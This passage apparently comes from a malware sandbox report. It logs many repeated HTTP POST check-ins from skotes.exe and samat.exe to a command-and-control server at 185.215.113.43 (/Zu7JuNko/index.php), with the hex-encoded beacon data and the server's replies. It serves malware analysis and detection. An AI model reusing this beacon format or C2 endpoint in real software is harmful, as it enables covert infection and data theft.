                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:57.353544950 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:15:57 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    67192.168.2.550350185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:59.116435051 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:00.502609968 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:16:00 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    68192.168.2.550353185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:02.132677078 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:03.514820099 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:16:03 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    69192.168.2.549823185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:05.275778055 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:06.652935028 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:16:06 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    70192.168.2.549825185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:08.287337065 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:09.633805990 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:16:09 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    71192.168.2.549826185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:11.382698059 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:12.722959995 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:16:12 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    72192.168.2.549827185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:14.350575924 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:15.750852108 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:16:15 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    73192.168.2.549828185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:17.497375965 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:18.929112911 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:16:18 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    74192.168.2.549829185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:20.554511070 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:22.017170906 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:16:21 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    75192.168.2.549830185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:23.775336981 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:25.159796953 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:16:24 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    76192.168.2.549831185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:26.788206100 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:28.180253029 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:16:27 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    77192.168.2.549832185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:29.928020954 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:31.362492085 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:16:31 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    78192.168.2.549833185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:32.991607904 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:34.377887964 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:16:34 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    79192.168.2.550106185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:39.148222923 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:40.484082937 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:16:40 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    80192.168.2.550107185.215.113.43806120C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:42.225697041 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:43.659493923 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:16:43 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    81192.168.2.550109185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:48.460131884 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:49.800642967 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:16:49 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    82192.168.2.550111185.215.113.43806120C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:51.431898117 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
